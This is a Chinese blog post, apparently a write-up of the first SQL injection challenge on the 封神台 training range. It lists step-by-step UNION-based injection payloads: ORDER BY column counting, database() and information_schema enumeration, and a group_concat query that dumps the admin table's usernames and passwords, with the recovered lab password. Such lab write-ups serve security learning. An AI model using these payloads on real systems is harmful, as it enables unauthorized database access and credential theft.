当前位置:首页 » 《资源分享》 » 正文

封神台sql注入---第一章节: 为了女神小芳_风流小小贼的博客

14 人参与  2021年10月27日 11:43  分类 : 《资源分享》  评论

点击全文阅读


1:靶场链接:  https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7icon-default.png?t=L892https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7

2:解题过程:

(1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。

(2):判断字段个数:

      注入代码: order by 3 :页面显示异常
                         order by 2 :  页面显示正常

                         //判读字段数为2

 (3):判断字段是否有回显,及回显位置.

       注入语句: id =3534 union select 1,2 --

   

(4):猜解数据库名

      id = 2433 union select 1,database()

       数据库名为   maoshe

(5):猜解数据表名:

 id=2433 union select 1,table_name from information_schema.tables where table_schema='maoshe'

数据表名为: admin

(6):猜解所有字段:

id=1232 union select 1,(select group_concat(column_name,"~") from information_schem

a.columns where table_schema='maoshe' and table_name='admin')

字段名为:Id ,username, password

(7):获取用户信息:

(select group_concat(id,'--',username,'--',password,'--') from maoshe.admin)

获取用户密码: hellohack  过关!!!

 

 


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/30174.html

字段  解数  注入  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1